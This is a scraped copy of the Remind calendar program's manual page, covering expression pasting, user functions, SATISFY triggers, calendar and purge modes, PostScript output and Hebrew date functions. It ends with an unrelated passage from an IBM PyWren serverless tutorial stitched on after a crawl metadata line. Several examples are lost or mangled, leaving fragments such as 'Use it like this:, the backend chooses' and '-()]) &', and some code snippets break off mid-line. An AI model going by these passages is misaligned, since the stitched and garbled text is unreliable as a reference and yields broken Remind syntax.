First, you create text files and an instance of IBM Cloud Object Storage to hold those files. Then, you set up PyWren and create Python code for running a word count at scale.
Create two .txt files that contain text with words that need to be counted for this tutorial.
Create one file named sixteenwords.txt, and paste in the following text:
sixteenwords.txt
These are just some words there are sixteen.
These are just some words there are sixteen.
Create another file named eightwords.txt, and paste in the following text:
eightwords.txt
These are just some words there are eight.
Save these files.
Now you run some data analysis against objects that are stored in a Cloud Object Storage bucket. Start by creating the Cloud Object Storage service and bucket.
Go to the IBM Cloud Object Storage page in the IBM Cloud Catalog.
Choose a Service name and click Create.
Click Buckets on the left menu and type a bucket name such as words. Choose the resiliency and the location. For this example, use Regional resiliency in the us-south location.
words
Click Create Bucket.
After the bucket is created, add your two .txt files by clicking Upload in the upper right corner. You can also drag the files to the bucket.
Create another bucket that PyWren uses to store results in. On the left menu, click Buckets. Provide a bucket name, such as pywrenresults. Choose the same resiliency and location options as the words bucket, and click Create Bucket.
pywrenresults
Click Endpoints on the left menu and notice the public Regional us-south endpoint. It should be something like: s3.us-south.cloud-object-storage.appdomain.cloud.
Regional us-south
s3.us-south.cloud-object-storage.appdomain.cloud
Click Service Credentials on the left menu. If a service credential is not created, click Create. After you have a service credential, make note of the value for apikey.
apikey
Clone the pywren-ibm-cloud repository:
git clone [email protected]:pywren/pywren-ibm-cloud.git
Navigate to the pywren folder inside the pywren-ibm-cloud folder:
pywren
pywren-ibm-cloud
cd pywren-ibm-cloud/pywren
Obtain the most recent stable release version from the release tab:
git checkout 1.0.3
Build and install the project:
python3 setup.py install --force
Copy the pywren/ibmcf/default_config.yaml.template into a file named ~/.pywren_config:
pywren/ibmcf/default_config.yaml.template
~/.pywren_config
cp ibmcf/default_config.yaml.template ~/.pywren_config
Edit the ~/.pywren_config file with the information you saved earlier from Cloud Object Storage:
ibm_cos:
# make sure to use full path.
# for example
endpoint : <COS_API_ENDPOINT>
api_key : <COS_API_KEY>
Edit the ~/.pywren_config file with the bucket name for storing the results from PyWren:
pywren:
storage_bucket: <BUCKET_NAME>
You also need to give PyWren an endpoint, a namespace, and an API key from Cloud Functions. You can find that information at the API Key page.
ibm_cf:
# Obtain all values from
# endpoint is the value of 'host'
# make sure to use https:// as prefix
endpoint : <CLOUD_FUNCTIONS_API_ENDPOINT>
# namespace = value of CURRENT NAMESPACE
namespace : <CLOUD_FUNCTIONS_NAMESPACE>
api_key : <CLOUD_FUNCTIONS_API_KEY>
Save the file.
The PyWren main action is responsible for executing Python functions inside PyWren’s runtime environment within Cloud Functions.
To deploy the runtime, navigate into the runtime folder and then run the deploy_runtime script:
runtime
deploy_runtime
```
cd ../runtime
./deploy_runtime
```
This script automatically creates a Python 3.6 action named pywren_3.6, which is based on the python:3.6 docker image. This action is used to run the Cloud Functions with PyWren.
pywren_3.6
python:3.6
Create a file named word_counter.py.
word_counter.py
Copy and paste the following code into the file:
import pywren_ibm_cloud as pywren
bucketname = 'words'
def my_map_function(bucket, key, data_stream):
print('I am processing the object {}/{}'.format(bucket, key))
counter = {}
data = data_stream.read()
for line in data.splitlines():
for word in line.decode('utf-8').split():
if word not in counter:
counter[word] = 1
else:
counter[word] += 1
return counter
def my_reduce_function(results):
final_result = {}
for count in results:
for word in count:
if word not in final_result:
final_result[word] = count[word]
else:
final_result[word] += count[word]
return final_result
chunk_size = 4*1024**2 # 4MB
pw = pywren.ibm_cf_executor()
pw.map_reduce(my_map_function, bucketname, my_reduce_function, chunk_size)
print(pw.get_result())
Update the bucketname variable (around line 3) to point to your own bucket containing the .txt documents, which you created earlier.
bucketname
Inspect the code. You can see a map function that counts each instance of a particular word, and a reduce function that compiles those results into one. PyWren runs each of the map functions as separate cloud functions. If you are processing a large data set, this approach can greatly improve running the computation in parallel. As you can see, the following code to kick off these parallel functions is straightforward:
pw = pywren.ibm_cf_executor()
pw.map_reduce(my_map_function, bucketname, my_reduce_function, chunk_size)
Run the python file that you just created:
python3 word_counter.py
You should see the following result with the word count for each instance of each word:
{'These': 3, 'are': 6, 'just': 3, 'some': 3, 'words': 3, 'there': 3, 'sixteen.': 2, 'eight.': 1}
You can check out the invocations in the Monitor page on the IBM Cloud Functions UI. As show in the following screen capture, you should see three new invocations, one for each of the .txt documents that are processed, and one for a combination of the results.
You can also check out the results in the pywrenresults bucket ythat you created in the Cloud Object Storage dashboard:
In this tutorial, you set up PyWren and used it to scale out functions to count the occurences of words in a set of text documents stored in a Cloud Object Storage instance. While this is a simple use case example, you can use it as a basis for your next project. We’re excited to see how you use PyWren to build on IBM Cloud Functions.
CloudData stores+
Get the Code »
Conference
June 24, 2019
API ManagementCloud+
Back to top | https://developer.ibm.com/tutorials/quickly-run-python-code-at-scale/ | CC-MAIN-2019-35 | refinedweb | 1,243 | 57.57 |
My Attribute Disappears
The GetCustomAttributes scenario (ICustomAttributeProvider.GetCustomAttributes
or
Attribute.GetCustomAttributes, referred to as GetCA in this post) involves
3 pieces:
- a custom attribute type
- an entity which is decorated with the custom attribute
- a code snippet calling GetCA on the decorated entity.
These pieces could be residing together in one assembly; or separately in 3 different
assemblies. The following C# code shows each piece in separate files, and I will
compile them into 3 assemblies: the attribute type assembly (attribute.dll), the
decorated entity assembly (decorated.dll) and the querying assembly (getca.exe):
// file: attribute.cs
public class MyAttribute
: System.Attribute { }
// file: decorated.cs
[My]
public class MyClass
{ }
// file: getca.cs
using System;
using System.Reflection;
class Demo {
static void Main(string[]
args) {
Assembly asm = Assembly.LoadFrom(args[0]);
object[] attrs = asm.GetType("MyClass").GetCustomAttributes(true);
Console.WriteLine(attrs.Length);
}
}
D:\> sn.exe -k sn.key
D:\> csc /t:library /keyfile:sn.key attribute.cs
D:\> csc /t:library /r:attribute.dll decorated.cs
D:\> gacutil -i attribute.dll
D:\> del attribute.dll
D:\> csc getca.cs
D:\> getca.exe decorated.dll
1
D:\> getca.exe \\machine\d$\decorated.dll
0
attribute.dll is installed in GAC (no local copy, to avoid confusion); getca.exe
checks whether the loaded type MyClass has MyAttribute. As you see from the output,
MyAttribute disappeared when the decorated entity was loaded from a share (or as
a partially trusted assembly, to be precise).
GetCA is supposed to return an array of attribute objects. In order to do so, it
parses the custom attribute metadata, finds the right custom attribute constructor,
and then invokes that .ctor with some parameters (if any). It is a late-bound call,
reflection decides whether the querying assembly should invoke the attribute .ctor,
or avoid calling it for security reasons.
Let me quote something from
ShawnFa's security blog: "by default, strongly named, fully trusted assemblies
are given an implicit LinkDemand for FullTrust on every public and protected method
of every publicly visible class". This means, in a scenario where a library is strongly
named and fully trusted, partial trusted assemblies are unable to call into such
library.
The GetCA scenario is not exactly the same, but similar. The .ctor to be invoked
is in attribute.dll (in GAC, strongly named and fully trusted). The querying assembly
(runs locally, fully trusted too) is the code that makes the invocation (if that
were to happen). But to make this .ctor invocation, we need pass in the parameters,
which are provided by the decorated entity assembly. GetCA will take the decorated
entity as the caller to the attribute type constructor. Based on what I
just quoted, if the decorated entity assembly is partially trusted, we will filter
out such attribute object creation, unless the attribute assembly is decorated with
AllowPartiallyTrustedCallersAttribute. Note please read
Shawn's blog entry carefully about this attribute and its' security
implications before taking this approach.
What if the attribute and decorated entity are in the same assembly? In this case,
it does not matter whether the assembly is loaded from a share or locally. GetCA
will try to create and return the attribute object. If the loaded assembly is partially
trusted, the runtime gives it a smaller set of permissions and running the .ctor
code is not going to do something terrible.
To close, GetCA will try to create the custom attribute object if any of the following
3 conditions is true:
- the decorated entity and the custom attribute type are in one assembly,
- the decorated entity is fully trusted,
- the assembly which defines the custom attribute type is decorated with APTCA.
By the way, the new class
CustomAttributeData in .NET 2.0 is designed to access custom attribute in
the reflection-only context, where no code will be executed (only metadata checking).
If we use CustomAttributeData.GetCustomAttributes instead in the above example,
it prints 1; one CustomAttributeData object, not one MyAttribute object. | https://docs.microsoft.com/en-us/archive/blogs/haibo_luo/my-attribute-disappears | CC-MAIN-2020-45 | refinedweb | 656 | 51.34 |
Readable url’s in Wicket - An introduction to wicketstuff-annotation.
Recently I read an article called “Wicket Creating RESTful URLs”. It’s a useful article but it still didn’t feel right. It should be easier and in the right place.
In Stripes for example you can just put @UrlBinding("/helloWorld.action") on your ActionBean and it works. That’s what I want!
After some searching I found wicketstuff-annotation. Wicketstuff provides a large set of additions to Wicket to make it even better. wicketstuff-annotation is a small part of it.
Start from scratch
To demonstrate wsa (Wicketstuff annotation) I will let Maven 2 generate a simple Wicket application from scratch. To generate this application visit
Execute this statement on the command line and you’ll have a working Wicket application within seconds.
Add a link to HomePage.html so you can see what url’s Wicket generates and how to improve them:
<wicket:link> <a href="HomePage2.html?page=133¶graph=25"> Link to wicket document HomePage2.html </a> </wicket:link>
Make a copy of HomePage.java and HomePage.html and call the files HomePage2.java and HomePage2.html. Change the href to HomePage2.html in the file HomePage2.html to HomePage.html. When you redeploy the application you will see the unreadable url I was talking about earlier: /wicketstuff-test/?wicket:bookmarkablePage=:com.xebia.HomePage2¶graph=25&page=133
I added the parameters page and paragraph to show that even these parameters can be made more readable.
Another bad thing is that we expose our package structure. End users don’t care in what package the page is and you shouldn’t give potential hackers any information.
The plain Wicket solution
The simplest solution is mounting a package to a path. We can map all of the package com.xebia to for example. Unfortunately we cannot map to the root (/) of the application. To mount a package add the following line to the constructor of WicketApplication:
mount("web",PackageName.forClass(HomePage.class));
The ugly url now looks much better:
Even the parameters page and paragraph are improved.
Suppose you don’t want to expose the name of your WebPage (HomePage2) and also hide the parameter names. This can be achieved by mounting a MixedParamurlCodingStrategy to the application:
public WicketApplication() {String[] parameterNames = new String[] { "page", "paragraph"};MixedParamUrlCodingStrategy mixedParamUrlCodingStrategy = new MixedParamUrlCodingStrategy("h2", HomePage2.class, parameterNames);mount(mixedParamUrlCodingStrategy);}
The problem with this solution is that you have to pass all parameters and put all class files in the Application file. The url structure and page parameters are related to the page, not the application, so they should be on the WebPage. But the result is a very nice url without having to add an extra dependency to wsa:
The Wicketstuff Annotation solution
To add wsa suppport to your application you have to add a dependency to your pom.xml:
<dependency><groupId>org.wicketstuff</groupId><artifactId>wicketstuff-annotation</artifactId><version>1.1</version></dependency>
The next step is clearing the old solution from the constructor of WicketApplication.
Add the folllowing line:
new AnnotatedMountScanner().scanPackage("com.xebia").mount(this);
This line will search the package com.xebia for annotations to mount url’s. In a production environment it is probably smarter to limit this to the package where all the WebPage classes are (ie. com.xebia.web).
Now we can finally add annotations to HomePage2 :
@MountPath(path = "h2")@MountMixedParam(parameterNames = { "page", "paragraph" })public class HomePage2 extends WebPage {...}
This works exactly the same as before, only in the right place.
There are several variations on the second annotation :
@MountPath (and no second annotation)
@MountPath and @MountMixedParam
@MountPath and @MountQueryString
There are several other encoding strategies you can use. On the wsa javadoc there isn’t much information. When you want to know more you should consult the Wicket javadocs and look for the package org.wicket.request.target.coding. The names used here are similar to the ones for wsa.
Conclusion
Wicketstuff annotation is a very nice addition to Wicket. It helps you to encode your url’s in the right place. The only small drawback is the dependency on Spring core, such a small library as wsa should work without Spring (not that Spring is a bad thing, I just don’t like many dependencies). So don’t be alarmed when you see a Spring jar pop up between your libraries.
Also be aware that the mount(path, packageName) solution is the safest when you don’t want to expose the package structure. When you forget to add annotations you end up with the ugly url’s and still exposing the package structure. I tried to add multiple mount points, but this wasn’t possible.
Sources
Hi Jeroen,
Nice write-up!
Annotations are a great way to put the URL definitions near the code that handles the URLs. I don't know if exposing your package structure is safer, it sounds more like security through obscurity... anyway, RESTful urls look much nicer!
Daan (writer of the Create RESTful URLs article)
I blog often and I truly appreciate your content. The article has truly peaked my interest. I will take a note of your blog and keep checking for new details about once a week. I opted in for your RSS feed as well. | http://blog.xebia.com/readable-url%E2%80%99s-in-wicket-an-introduction-to-wicketstuff-annotation/ | CC-MAIN-2017-13 | refinedweb | 881 | 50.33 |
Include a file
You are encouraged to solve this task according to the task description, using any language you may know.
- Task
Demonstrate the language's ability to include source code from other files.
360 Assembly
The COPY instruction includes source statements from the SYSLIB library.
COPY member
ACL2
For files containing only events (definitions and similar; no top-level function calls) which are admissible (note the lack of file extension):
(include-book "filename")
For all other files:
(ld "filename.lisp")
Ada
Some remarks are necessary here. Ada does not define how the source code is stored in files. The language rather talks about compilation units. A compilation unit "imports" another compilation unit by using context clauses - these have the syntax "with CU1, CU2, ...;". All compilers I know of require in their standard mode exactly one compilation unit per file; also file naming conventions vary. However GNAT e.g. has a mode that can deal with files holding several compilation units and any file name conventions.
with Ada.Text_IO, Another_Package; use Ada.Text_IO;
-- the with-clause tells the compiler to include the Text_IO package from the Ada standard
-- and Another_Package. Subprograms from these packages may be called as follows:
-- Ada.Text_IO.Put_Line("some text");
-- Another_Package.Do_Something("some text");
-- The use-clause allows the program author to write a subprogram call shortly as
-- Put_Line("some text");
ALGOL 68
The formal definition of Algol68 makes numerous references to the standard prelude and postlude.
At the time the language was formally defined it was typical for code to be stored on decks of punched cards (or paper tape). Possibly because storing code on disk (or drum) was expensive. Similarly card decks can be read sequentially from just one card reader. It appears the Algol68 "standard" assumed all cards could be simply stacked before and after the actual source code, hence the references "prelude" and "postlude" in the formal standard.
ALGOL 68G
In the simplest case a file can be included as follows:
PR read "file.a68" PR
But in the Algol68 formal reports - it appears - the intention was to have a more structured approach.

File: prelude/test.a68

# -*- coding: utf-8 -*- #
BEGIN
# Exception setup code: #
   on value error(stand out, (REF FILE f)BOOL: GOTO value error not mended);
# Block setup code: #
   printf(($"Prelude test:"l$))

File: postlude/test.a68

# -*- coding: utf-8 -*- #
# Block teardown code: #
   printf(($"Postlude test."l$))
EXIT
# Exception code: #
   value error not mended: SKIP
END

File: test/include.a68

#!/usr/bin/a68g --script #
# -*- coding: utf-8 -*- #
PR read "prelude/test.a68" PR;
printf($4x"Hello, world!"l$);
PR read "postlude/test.a68" PR
- Output:
Prelude test:
    Hello, world!
Postlude test.
Other implementations: e.g. ALGOL 68RS and ALGOL 68C
Note that actual source code inclusion with parsing can be avoided because of a more generalised separate compilation method storing declaration specifications in a data dictionary. This differs from the #include found in C, where the include file needs to be parsed for each source file that includes it.
ALGOL 68RS
This British implementation of the language has various ways to include it's own source code and and integrate with code compiled from other languages.
In order to support a top-down programming style ALGOL 68RS provided the here and context facilities.
A program could be written with parts to be filled in later marked by a here tag followed by a keeplist of declarations to be made available.
program (pass1, pass2) compiler
begin
   string source := ...;
   tree parsetree;
   ...
   here pass1 (source, parsetree);
   ...
   instructions insts;
   here pass2 (parsetree, insts);
   ...
end
finish
The code to be executed in the context of the here tags would be written as:
program pass1 implementation
context pass1 in compiler
begin
   ... { code using "source" and "parsetree" }
end
finish
here is similar to the ALGOL 68C environ and context is equivalent to the ALGOL 68C using.
ALGOL 68C
Separate compilation in ALGOL 68C is done using the ENVIRON and USING clauses. The ENVIRON saves the complete environment at the point it appears. A separate module written starting with a USING clause is effectively inserted into the first module at the point the ENVIRON clause appears.
Example of ENVIRON clause
A file called mylib.a68:
BEGIN
INT dim = 3; # a constant #
INT a number := 120; # a variable #
ENVIRON EXAMPLE1;
MODE MATRIX = [dim, dim]REAL; # a type definition #
MATRIX m1;
a number := ENVIRON EXAMPLE2;
print((a number))
END
Example of USING clause
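The original example for this clause appears to have been lost in extraction. The following is only a sketch of what a separately compiled USING module might look like: the module name EXAMPLE2 and the library name "mylib" are taken from the ENVIRON example above, but the exact syntax and body are assumptions, not verified ALGOL 68C.

```algol68
USING EXAMPLE2 FROM "mylib"
BEGIN
   MATRIX m2;                # MODE MATRIX saved by the ENVIRON is visible here #
   print(("Hello from EXAMPLE2")); # so are the saved variables and constants #
   a number + dim            # this value is yielded to "ENVIRON EXAMPLE2" above #
END
```

Conceptually, compiling this module against the saved environment and running the first module would assign 123 (120 + 3) to "a number" at the point of the ENVIRON EXAMPLE2 clause.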
AntLang
AntLang is made for interactive programming, but a way to load files exists, even if it is really primitive: the loaded file simply gets the current environment and manipulates it.
load["script.ant"]
Applesoft BASIC
Chain PROGRAM TWO to PROGRAM ONE. First create and save PROGRAM TWO. Then, create PROGRAM ONE and run it. PROGRAM ONE runs and then "includes" PROGRAM TWO which is loaded and run using the Binary program CHAIN from the DOS 3.3 System Master. Variables from PROGRAM ONE are not cleared so they can be used in PROGRAM TWO. User defined functions should be redefined in PROGRAM TWO. See "Applesoft: CHAIN and user-defined functions Issues"
10 REMPROGRAM TWO
20 DEF FN A(X) = X * Y
30 PRINT FN A(2)
SAVE PROGRAM TWO
10 REMPROGRAM ONE
20 Y = 6
30 DEF FN A(X) = X * Y
40 PRINT FN A(2)
50 D$ = CHR$ (4)
60 PRINT D$"BLOADCHAIN,A520"
70 CALL 520"PROGRAM TWO"
SAVE PROGRAM ONE
RUN
- Output:
12
12
AutoHotkey[edit]
#Include FileOrDirName
#IncludeAgain FileOrDirName
AWK[edit]
The awk extraction and reporting language does not support the use of include files. However, it is possible to provide the name of more than one source file at the command line:
awk -f one.awk -f two.awk
The functions defined in different source files will be visible from other scripts called from the same command line:
# one.awk
BEGIN {
sayhello()
}
# two.awk
function sayhello() {
print "Hello world"
}
However, it is not permissible to pass the name of additional source files through a hashbang line, so the following will not work:
#!/usr/bin/awk -f one.awk -f two.awk
GNU Awk has an
@include which can include another awk source file at that point in the code.
@include "filename.awk"
This is a parser-level construct and so must be a literal filename, not a variable or expression. If the filename is not absolute then it's sought in an
$AWKPATH list of directories. See the gawk manual for more.
Axe[edit]
This will cause the program called OTHER to be parsed as if it was contained in the source code instead of this line.
prgmOTHER
BaCon[edit]
other.bac
other = 42
including.bac
' Include a file
INCLUDE "other.bac"
PRINT other
- Output:
prompt$ bacon including.bac
Converting 'including.bac'... done, 4 lines were processed in 0.005 seconds.
Compiling 'including.bac'... cc -c including.bac.c
cc -o including including.bac.o -lbacon -lm
Done, program 'including' ready.
prompt$ ./including
42
BASIC[edit]
The include directive must be in a comment, and the name of the file for inclusion is enclosed in single quotes (a.k.a. apostrophes).
Note that this will not work under QBasic.
REM $INCLUDE: 'file.bi'
'$INCLUDE: 'file.bi'
See also: BBC BASIC, Gambas, IWBASIC, PowerBASIC, PureBasic, Run BASIC, ZX Spectrum Basic
Batch File[edit]
call file2.bat
BBC BASIC[edit]
CALL filepath$
The file is loaded into memory at run-time, executed, and then discarded. It must be in 'tokenised' (internal) .BBC format.
Bracmat[edit]
get$"<i>module</i>"
ChucK[edit]
Machine.add(me.dir() + "/MyOwnClassesDefinitions.ck");
C / C++[edit]
C#[edit]
/* The C# language specification does not give a mechanism for 'including' one source file within another,
* likely because there is no need - all code compiled within one 'assembly' (individual IDE projects
* are usually compiled to separate assemblies) can 'see' all other code within that assembly.
*/
Clipper[edit]
Clojure[edit]
Just as in Common Lisp:
(load "path/to/file")
This would rarely be used for loading code though, since Clojure supports modularisation (like most modern languages) through namespaces and code is typically located/loaded via related abstractions. It's probably more often used to load data or used for quick-and-dirty experiments in the REPL.
COBOL[edit]
In COBOL, code is included from other files by the
COPY statement. The files are called copybooks, normally end with the file extension '.cpy' and may contain any valid COBOL syntax. The
COPY statement takes an optional
REPLACING clause, which allows any text within the copybook to be replaced with something else.
COPY "copy.cpy". *> The full stop is mandatory, wherever the COPY is.
COPY "another-copy.cpy" REPLACING foo BY bar
SPACE BY ZERO
==text to replace== BY ==replacement text==.
Common Lisp[edit]
(load "path/to/file")
D[edit]
D has a module system, so usually there is no need of a textual inclusion of a text file:
import std.stdio;
To perform a textual inclusion:
mixin(import("code.txt"));
Déjà Vu[edit]
#with the module system:
!import!foo
#passing a file name (only works with compiled bytecode files):
!run-file "/path/file.vu"
Delphi[edit]
uses SysUtils; // Lets you use the contents of SysUtils.pas from the current unit
{$Include Common} // Inserts the contents of Common.pas into the current unit
{$I Common} // Same as the previous line, but in a shorter form
DWScript[edit]
In addition to straight inclusion, there is a filtered inclusion, in which the include file goes through a pre-processing filter.
{$INCLUDE Common} // Inserts the contents of Common.pas into the current unit
{$I Common} // Same as the previous line, but in a shorter form
{$INCLUDE_ONCE Common} // Inserts the contents of Common.pas into the current unit only if not included already
{$FILTER Common} // Inserts the contents of Common.pas into the current unit after filtering
{$F Common} // Same as the previous line, but in a shorter form
Emacs Lisp[edit]
Write this code in: file1.el
(defun sum (ls)
(apply '+ ls) )
In the directory of file1.el, we write this new code in: file2.el
(add-to-list 'load-path "./")
(load "./file1.el")
(insert (format "%d" (sum (number-sequence 1 100) )))
Output:
5050
Erlang[edit]
-include("my_header.hrl"). % Includes the file at my_header.erl
Euphoria[edit]
include my_header.e
Factor[edit]
USING: vocaba vocabb... ;
Forth[edit]
include matrix.fs
Other Forth systems have a smarter word, which protects against multiple inclusion. The name varies: USES, REQUIRE, NEEDS.
Fortran[edit]
include char-literal-constant
"The interpretation of char-literal-constant is processor dependent. An example of a possible valid interpretation is that char-literal-constant is the name of a file that contains the source text to be included." See section 3.4 Including source text of the ISO standard working draft (Fortran 2003).
Included content may itself involve further inclusions but should not start with any attempt at the continuation of a statement preceding the include line nor should there be any attempt at the line following the include being a continuation of whatever had been included. It is not considered to be a statement (and so should not have a statement label) in Fortran itself but something a Fortran compiler might recognise, however a trailing comment on that line may be accepted. The exact form (if supported at all) depends on the system and its file naming conventions, especially with regard to spaces in a file name. The file name might be completely specified, or, relative as in
INCLUDE "../Fortran/Library/InOutCom.for"
Further, Fortran allows text strings to be delimited by apostrophes as well as by quotes, and there may be different behaviour for the two sorts, if recognised. For instance, the relative naming might be with reference to the initial file being compiled, or with reference to the directory position of the file currently being compiled - it being the source of the current include line - as where file InOutCom.for contained an inclusion line specifying another file in the same library collection.
Different compilers behave differently, and standardisation attempts have not reached back to earlier compilers.
FreeBASIC[edit]
File to be included :
' person.bi file
Type Person
name As String
age As UInteger
Declare Operator Cast() As String
End Type
Operator Person.Cast() As String
Return "[" + This.name + ", " + Str(This.age) + "]"
End Operator
Main file :
' FB 1.05.0 Win 64
' main.bas file
#include "person.bi"
Dim person1 As Person
person1.name = "Methuselah"
person1.age = 969
Print person1
Print "Press any key to quit"
Sleep
- Output:
[Methuselah, 969]
Furryscript[edit]
Use a word with a trailing slash to import; how the file is found is implementation-defined (normally the "furinc" directory is searched for include files).
The file is imported into a new namespace. The same name, with the slash followed by a further name, then refers to that name inside the imported namespace.
FutureBasic[edit]
FB has powerful tools to include files in a project. Its "include resources" statement allows you to specify any number of files for copying into the built application package's Contents/Resources/ directory.
include resources "SomeImage.png"
include resources "SomeMovie.mpeg"
include resources "SomeSound.aiff"
include resources "SomeIcon.icns"
include resources "Info.plist" //Custom preference file to replace FB's generic app preferences
Including C or Objective-C headers (i.e. files with the .h extension) or source files (files with the .c or .m extension) requires a different 'include' syntax:
include "HeaderName.h" // do not use 'include resources' to include C/Objective-C headers
include "CSourceFile.c"
include "ObjectiveCImplementationFile.m"
Another special case are Objective-C .nib or .xib files. These are loaded with:
include resources "main.nib"
However, .nib files are copied to the built application's Contents/Resources/en.lproj/ directory.
Mac OS X frameworks may be specified with the 'include library' statement, which has two forms:
include library "Framework/Header.h"
include library "Framework" // optional short form, expanded internally to: include library "Framework/Framework.h"
After including a Framework, you must notify the compiler of specific functions in the Framework that your code will be using with FB's "toolbox fn" statement as shown in this example:
include library "AddressBook/AddressBookUI.h"
// tell FBtoC the functions
toolbox fn ABPickerCreate() = ABPickerRef
Special treatment for C static libraries (*.a): The include statement copies the library file to the build_temp folder; you must also place the name of the library file in the preferences 'More compiler options' field [this causes it to be linked]. The example below is for a library MyLib that exports one symbol (MyLibFunction).
include "MyLib.a"
BeginCDeclaration
// let the compiler know about the function
void MyLibFunction( void ); // in lieu of .h file
EndC
// let FBtoC know about the function
toolbox MyLibFunction()
MyLibFunction() // call the function
An include file can also contain executable source code. Example: Suppose we create a file "Assign.incl" which contains the following lines of text:
dim as long a, b, c
a = 3
b = 7
Now suppose we write a program like this:
include "Assign.incl"
c = a + b
print c
When we compile this program, the result will be identical to this:
dim as long a, b, c
a = 3
b = 7
c = a + b
print c
Other include cases are detailed in FB's Help Center.
Gambas[edit]
In gambas, files are added to the project via the project explorer main window which is a component of the integrated development environment.
Here a file is loaded into a variable
Public Sub Form_Open()
Dim sFile As String
sFile = File.Load("FileToLoad")
End
GAP[edit]
Read("file");
Gnuplot[edit]
load "filename.gnuplot"
This is the same as done for each file named on the command line. Special filename
"-" reads from standard input.
load "-" # read standard input
If the system has
popen then piped output from another program can be loaded,
load "< myprogram" # run myprogram, read its output
load "< echo print 123"
call is the same as
load but takes parameters which are then available to the sub-script as
$0 through
$9
call "filename.gnuplot" 123 456 "arg3"
Harbour[edit]
Haskell[edit]
-- Due to Haskell's module system, textual includes are rarely needed. In
-- general, one will import a module, like so:
import SomeModule
-- For actual textual inclusion, alternate methods are available. The Glasgow
-- Haskell Compiler runs the C preprocessor on source code, so #include may be
-- used:
#include "SomeModule.hs"
HTML[edit]
Current HTML specifications do not provide an include tag. At present, the only way to include content from another file is via an iframe; however, this is not supported by some browsers and looks untidy in others:
<iframe src="foobar.html">
Sorry: Your browser cannot show the included content.</iframe>
There is an unofficial tag, but this will be ignored by most browsers:
<include>foobar.html</include>
Icon and Unicon[edit]Include another file of source code using the preprocessor statement:
$include "filename.icn"
IWBASIC[edit]
$INCLUDE "ishelllink.inc"
Further, external library or object files can be specified with the $USE statement, which is a compiler preprocessor command:
$USE "libraries\\mylib.lib"
IWBASIC also allows resources, files and data that are compiled with an application and embedded in the executable. However, resources in IWBASIC may be used only for projects, i.e., programs that have more than one source file.
Various resources are loaded as follows:
Success=LOADRESOURCE(ID,Type,Variable)
ID is a numeric or string identifier of the resource, TYPE is a numeric or string type, and the loaded data is stored in Variable. The standard Windows resource types can be specified and loaded in raw form using the following constants:
@RESCURSOR
@RESBITMAP
@RESICON
@RESMENU
@RESDIALOG
@RESSTRING
@RESACCEL
@RESDATA
@RESMESSAGETABLE
@RESGROUPCURSOR
@RESGROUPICON
@RESVERSION
J[edit]
The usual approach for a file named 'myheader.ijs' would be:
require 'myheader.ijs'
However, this has "include once" semantics, and if the requirement is to include the file even if it has been included earlier you would instead use:
load 'myheader.ijs'
Java[edit]
To include source code from another file, you simply create an object of that other file's class, or 'extend' it using inheritance. The only requirement is that the other file exists in the same directory (or elsewhere on the classpath) so that it can be found. Since Java requires the class name to match the file name, using a class called Class2 from within Class1 needs no separate filename.
Just this would be enough.
public class Class1 extends Class2
{
//code here
}
You could also consider creating an instance of Class2 within Class1, and then using the instance methods.
public class Class1
{
Class2 c2=new Class2();
static void main(String[] args)
{
c2.func1();
c2.func2();
}
}
JavaScript[edit]
Pure JavaScript in browsers with the DOM[edit]
The following example, if loaded in an HTML file, loads the jQuery library from a remote site:
var s = document.createElement('script');
s.type = 'application/javascript';
// path to the desired file
s.src = '';
document.body.appendChild(s);
It should be noted that this technique can also request an HTTP source and eval() it.
With jQuery[edit]
$.getScript("");
With AMD (require.js)[edit]
require(["jquery"], function($) { /* ... */ });
CommonJS style with node.js (or browserify)[edit]
var $ = require('$');
ES6 Modules[edit]
import $ from "jquery";
jq[edit]
jq 1.5 has two directives for including library files, "include" and "import". A library file here means one that contains jq function definitions, comments, and/or directives.
The main difference between the two types of directive is that included files are in effect textually included at the point of inclusion, whereas imported files are imported into the namespace specified by the "import" directive. The "import" directive can also be used to import data.
Here we illustrate the "include" directive on the assumption that there are two files:
Include_a_file.jq
include "gort";
hello
gort.jq
def hello: "Klaatu barada nikto";
- Output:
$ jq -n -c -f Include_a_file.jq
Klaatu barada nikto.
Julia[edit]
Julia's
include function executes code from an arbitrary file:
include("foo.jl")
or alternatively
include_string executes code in a string as if it were a file (and can optionally accept a filename to use in error messages etcetera).
Julia also has a module system:
import MyModule
imports the content of the module
MyModule.jl (which should be of the form
module MyModule ... end, whose symbols can be accessed as
MyModule.variable, or alternatively
using MyModule
will import the module and all of its exported symbols
Kotlin[edit]
The closest thing Kotlin has to an #include directive is its import directive. This doesn't import source code as such but makes available names defined in another accessible package as if such names were defined in the current file i.e. the names do not need to be fully qualified except to resolve a name clash.
Either a single name or all accessible names in a particular scope (package, class, object etc.) can be imported.
For example, given this function declared in a file with the header `package package1`:
package package1

fun f() = println("f called")
We can now import and invoke this from code in the default package as follows:
// version 1.1.2
import package1.f // import f from package `package1`
fun main(args: Array<String>) {
f() // invoke f without qualification
}
- Output:
f called
LabVIEW[edit]
In LabVIEW, any VI can be used as a "SubVI" by changing the icon and wiring the terminals to the front panel. This cannot be explained concisely in code; instead, see the documentation.
Lasso[edit]
web_response -> include('my_file.inc')
include('myfile.lasso')
Lingo[edit]
-- load Lingo code from file
fp = xtra("fileIO").new()
fp.openFile(_movie.path&"someinclude.ls", 1)
code = fp.readFile()
fp.closeFile()
-- create new script member, assign loaded code
m = new(#script)
m.name = "someinclude"
m.scriptText = code
-- use it instantly in the current script (i.e. the script that contained the above include code)
script("someinclude").foo()
Logtalk[edit]
:- object(foo).
:- include(bar).
:- end_object.
Lua[edit]
To include a header file myheader.lua:
require "myheader"
m4[edit]
include(filename)
Maple[edit]
For textual inclusion, analogous to the C preprocessor, use the "$include" preprocessor directive. (The preprocessor is not a separate program, however.) This is frequently useful for large project development.
$include <somefile>
Or
$include "somefile"
It is also possible to read a file, using the "read" statement. This has rather different semantics.
read "somefile":
Mathematica / Wolfram Language[edit]
Get["myfile.m"]
MATLAB / Octave[edit]
MATLAB and Octave look for functions in *.m and *.mex files included in the "path". New functions can be included either by storing a new function in an existing path, or by extending the existing path to a new directory. When two functions have the same name, the function found first in the path takes precedence. The latter approach is shown here:
% add a new directory at the end of the path
path(path,newdir);
addpath(newdir,'-end'); % same as before
% add a new directory at the beginning
addpath(newdir);
path(newdir,path); % same as before
Maxima[edit]
load("c:/.../source.mac")$
/* or if source.mac is in Maxima search path (see ??file_search_maxima), simply */
load(source)$
Modula-2[edit]
IMPORT InOut, NumConv, Strings;
Modula-3[edit]
IMPORT IO, Text AS Str;
FROM Str IMPORT T
Nemerle[edit]
